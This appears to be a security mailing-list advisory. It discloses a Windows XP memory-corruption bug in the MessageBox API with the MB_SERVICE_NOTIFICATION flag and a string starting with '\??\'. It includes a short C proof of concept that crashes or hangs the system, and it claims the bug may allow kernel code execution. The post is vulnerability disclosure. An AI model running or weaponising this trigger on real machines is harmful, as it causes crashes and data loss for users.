Dear [email protected],
A security vulnerability in Microsoft Windows (tested on Windows XP)
is being discussed on a Russian forum. The vulnerability is caused by
memory corruption when a string beginning with "\??\" is sent through
the MessageBox API with the MB_SERVICE_NOTIFICATION flag. It looks like
some "debug" feature that was not cleaned out of the final release, and
it seems to be exploitable for code execution at kernel level. Code
example below:
#include <stdio.h>
#include <windows.h>

int main(void)
{
    int i;
    /* String beginning with "\??\", used as both text and caption */
    char bug1[] = "\\??\\XXXX";

    for (i = 0; i < 10; i++)
    {
        MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
    }
    return 0;
}
System hangs, crashes (BSOD) or reboots.
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/